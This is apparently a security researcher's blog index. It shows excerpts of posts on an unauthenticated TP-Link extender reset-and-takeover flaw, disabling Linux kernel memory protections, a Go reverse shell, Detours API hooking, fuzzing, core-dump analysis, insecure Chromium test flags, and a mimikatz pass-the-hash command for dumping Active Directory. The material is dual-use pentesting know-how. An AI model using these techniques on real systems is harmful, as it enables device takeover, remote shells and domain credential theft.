Posts By: malwrforensics

Affected Product: TP-Link TL-WA855RE Version: tested on TL-WA855RE(EU)_V5_200415 (possible earlier versions too) Description: TP-Link TL-WA855RE V5 20200415-rel37464 d evices allow an unauthenticated attacker (on the same network) to submit a TDDP_RESET POST request for a factory reset and reboot. The attacker can then obtain full access to the device by setting a new administrative password…. Read Article →

If you’re interested in removing some of the memory protections (especially around RWX) in the Linux kernel version 5+, here are some pointers: In the arch folder, edit the Kconfig file, and look for config STRICT_KERNEL_RWX and config STRICT_MODULE_RWX. You can change their default value to the values below. In the init folder, edit the… Read Article →

If you ever want to disable the WriteProtect (WP) bit you’ll need to read/write access to the CR0 register. The problem is that the write_cr0 function provided by the linux kernel has been tweaked to prevent this exact thing. Here are the steps you need to follow to compile a new kernel and have the… Read Article →

Here is a really small Go reverse shell (30-ish lines of code that includes comments). Environment setup: Download/install Go from here. If you use Windows, you may want to download/install the TDM-GCC compiler from here as well. Code: First, we need to define what libraries we need: import “net” import “fmt” import “bufio” import “os/exec”… Read Article →

Below is a basic example on how to use the detours library to hook APIs. #include <stdio.h> #include <windows.h> #include <detours.h> // API that we want to hook DWORD (WINAPI * Real_SleepEx)(DWORD dwMilliseconds, BOOL bAlertable) = SleepEx; // This function will be called *before* the API. // We will modify one of the parameters //… Read Article →

I’ve made some changes to bytefuzz to support files generated by other fuzzers. I’ve used the domato fuzzer to generate 1000 html files and then through bytefuzz, I’ve sent those files to a browser that I use when I do web app security testing. And soon enough, I got some interesting results… 🙂  

Let’s assume you have a program that just crashed and you have a core dump. You can enable core dumps by using the ulimit -c unlimited command. If you want to analyze what happened, here are some steps you can follow: //This will switch the disassembly listing to intel format. (gdb) set disassembly-flavor intel //To… Read Article →

If you want to do web app security testing using either Chrome or Chromium, you may want to disable a few security options so you can actually go through your test cases. You can use the same command line parameters for both of them: /usr/bin/chromium –disable-web-security –disable-xss-auditor –ignore-certificate-errors –user-data-dir=/pentesting/web/temp/data –proxy-server= This works for both Linux… Read Article →

If you have a hash for either a domain admin or a local admin on a domain controller, you can use mimikatz to exfil the entire Active Directory database. From mimikatz, run the following command to spawn a shell as the target user: sekurlsa::pth /user:<username> /domain:<domainname> /ntlm:<hash> /run:cmd.exe Now you have a few options from… Read Article →

Scroll To Top